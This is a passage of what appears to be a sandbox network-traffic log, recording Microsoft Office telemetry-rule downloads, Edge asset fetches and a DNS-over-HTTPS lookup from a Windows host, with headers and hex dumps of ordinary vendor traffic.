                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        43192.168.2.54981513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:37 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                        x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234937Z-1777c6cb7549j9hhhC1TEBzmcc0000000aa0000000001q26
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        44192.168.2.549820172.64.41.34437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:37 GMT
                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                        CF-RAY: 8e5c566b2dfc8c15-EWR
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1c 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        45192.168.2.54981813.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:36 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:37 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 428
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                        x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234937Z-178bfbc474bkvpdnhC1NYCuu2w00000000rg00000000qe2b
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        46192.168.2.54982113.107.246.454437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC711OUTGET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Edge-Asset-Group: EntityExtractionDomainsConfig
                                                                                                                                                                                                                                                        Sec-Mesh-Client-Edge-Version: 117.0.2045.47
                                                                                                                                                                                                                                                        Sec-Mesh-Client-Edge-Channel: stable
                                                                                                                                                                                                                                                        Sec-Mesh-Client-OS: Windows
                                                                                                                                                                                                                                                        Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                                                                                                                                                                                        Sec-Mesh-Client-Arch: x86_64
                                                                                                                                                                                                                                                        Sec-Mesh-Client-WebView: 0
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC583INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:37 GMT
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        Content-Length: 70207
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                        Last-Modified: Thu, 07 Nov 2024 20:03:34 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DCFF6742E8F24C
                                                                                                                                                                                                                                                        x-ms-request-id: e2b3c801-c01e-0053-2b87-3b7408000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234937Z-178bfbc474bvjk8shC1NYC83ns00000000e00000000056k1
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC15801INData Raw: 1f 8b 08 08 16 1d 2d 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7
                                                                                                                                                                                                                                                        Data Ascii: -gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
                                                                                                                                                                                                                                                        2024-11-20 23:49:38 UTC16384INData Raw: 4a b0 09 cb 82 45 ac c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31
                                                                                                                                                                                                                                                        Data Ascii: JEq*b,0Rte*|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;|a``|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1
                                                                                                                                                                                                                                                        2024-11-20 23:49:38 UTC16384INData Raw: 2f 4d 35 19 b9 3f d5 c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63
                                                                                                                                                                                                                                                        Data Ascii: /M5?Rg|M kt|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX*$Nkct&iZ%b8Zoj@ u2OgA1DG3*5d*lg|9GV>OVzVMPA76.|c
                                                                                                                                                                                                                                                        2024-11-20 23:49:38 UTC16384INData Raw: 99 dc 5a 2e 69 cf 52 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81
                                                                                                                                                                                                                                                        Data Ascii: Z.iRAHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`
                                                                                                                                                                                                                                                        2024-11-20 23:49:38 UTC5254INData Raw: 29 50 5f 50 34 9a d3 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83
                                                                                                                                                                                                                                                        Data Ascii: )P_P4*'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDY


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        47192.168.2.54982213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:37 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:38 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                        x-ms-request-id: 8157cc8d-f01e-0003-1961-3b4453000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234938Z-178bfbc474bv587zhC1NYCny5w00000000f00000000099h1
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:38 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        48192.168.2.54982913.107.246.454437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:38 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                                                                                                                                                                                        Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Edge-Asset-Group: Shoreline
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC557INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:39 GMT
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        Content-Length: 306698
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DBC9B5C40EBFF4
                                                                                                                                                                                                                                                        x-ms-request-id: 169fbee5-501e-003b-57a6-3b2a59000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234938Z-r1d97b99577lxltfhC1TEByw2s00000009r0000000000bem
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:39 UTC15827INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                                                                                                                                                                                        Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                                                                                                                                                                                        2024-11-20 23:49:40 UTC16384INData Raw: ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c 87 07 e7 d4 da 16 34 27 65 eb d7 87 be 44 96 29 71 b2 3a d6
                                                                                                                                                                                                                                                        Data Ascii: [T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz|PVM&UOu~{-oM5QafAp4'eD)q:
